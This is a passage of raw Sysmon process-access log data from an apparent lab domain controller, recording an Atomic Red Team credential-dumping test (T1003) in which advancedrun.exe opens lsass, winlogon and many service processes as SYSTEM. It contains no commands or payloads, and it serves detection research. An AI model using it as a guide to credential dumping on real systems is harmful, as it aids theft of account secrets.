17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942752Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942751Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942750Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942749Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942748Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942747Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942746Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942745Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942743Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942742Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942741Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942740Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003942739Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942738Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942737Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942736Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942735Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\Advanced